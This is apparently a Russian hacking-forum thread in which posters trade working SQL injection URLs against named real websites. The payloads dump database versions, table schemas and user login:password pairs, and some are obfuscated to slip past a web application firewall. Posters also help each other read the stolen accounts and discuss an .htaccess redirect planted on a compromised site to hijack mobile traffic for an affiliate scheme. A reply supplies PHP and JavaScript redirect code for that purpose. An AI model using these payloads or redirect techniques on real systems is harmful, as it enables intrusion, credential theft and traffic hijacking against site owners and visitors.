http://www.esoterica.ru/materials.php?id=13+limit+0,0+union+select+1,2,3,4,unhex(hex(version())),6,7--+ qaz, почитайте мануал от Dr.Z3r0, понадобится
Вопрос по WAP Лью траффик в одной партнерке на загрузку Skype, вписывал такой код в .htaccess RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://site.com/skype/2222/skype.auto [L,R=302] Трафф шел без проблем, но позавчера админ заметил код и что он мог сделать не пойму, код в .htaccess сохраняется а трафф не идет, как он cмог отрубить мобильный трафф? PS : Раньше он шеллы искал и удалял, а сейчас даже не ищет
Привожу полностью файл .htacess, js-код я не нашел RewriteEngine on RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone) [NC] RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC] RewriteRule (.*) http://site.com/skype/2222/skype.auto [L,R=302] RewriteEngine on RewriteCond $1 !^(robots\.txt) RewriteCond %{HTTP_HOST} ^site.ru|mail.site.ru|pop.site.ru|smtp.site.ru|ftp.site.ru|old.site.ru$ RewriteRule ^(.*)$ http://www.site.ru/$1 [NC,R=301,L] #RewriteCond %{REQUEST_FILENAME} shop2.* #RewriteRule . index-yii.php [QSA,L] RewriteCond %{REQUEST_FILENAME} scheme2.* RewriteRule . index-yii.php [QSA,L] #проверка существоания файла: RewriteCond %{REQUEST_FILENAME} !-f #проверка существования директории RewriteCond %{REQUEST_FILENAME} !-d #если не то не другое не сработало, передается к скрипту RewriteRule ^(.*)$ art_content.php?$1 [QSA,L] AddType application/x-httpd-php .css .shtml #php_flag log_errors On #php_flag display_errors Off #php_value error_reporting "E_ALL"
Code: AddType application/x-httpd-php [COLOR=Red].css[/COLOR] .shtml Подозрительно ^. PHP/Javascript-редирект сделать легко. Пример PHP: PHP: if ($version != "desktop") { $useragent=$_SERVER['HTTP_USER_AGENT']; if(preg_match('/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($useragent,0,4))) header('Location: http://TRAFF'); } Javascript: Code: <script type="text/javascript"> <!-- if (screen.width <= 699) { document.location = "http://TRAFF"; } //--> </script>
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(login,0x3a,password),3,4,5+from+lsh_infousers+--+
Как узнать в ProFTPD, включен или выключен mod_sql? Я слышал, что это exploit http://www.exploit-db.com/exploits/15449/ не работает при включении mod_sql или наоборот.
Moodle ^_^ Code: http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),3,4,5
Code: http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29-- Does not work, WAF?
Многие наверно видели уязвимость булки отсюда Вопрос: Как откорректировать запрос, если ответ от БД & Я делал запрос вида
waf!! that's work ))) http://www.awt.com.pk/news_detail.php?news_id=-5+union+/*!select*/+1,2,3,4,/*!table_name*/+from+information_schema./*!tables*/+where+table_schema=0x617774636F6D5F617774+limit+0,10--
если ты все верно написал то должно быть так- Adminusti,obz - login zbo - password p.s. разделитель у тебя 0x3a= :
Херню посоветовал. Там же group_concat а не просто concat или concat_ws используется. Поэтому вывелось 2 акка, разделитель :. Выходит так: логин - Admin пароль - pusti со 2 (тот что через запятую) точно также.
там походу два акка пользователей, в этой таблице, и ни один из них не авторизуется на сайте, поэтому я попробывал запрос http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(table_name,0x3a,column_name),3,4,5+from+information_schema.columns+where+column_name+like(0x257061737325)--+ и там еще есть таблички с колонкой пассворд попробуй перебрать их например вот эту mdl_userassword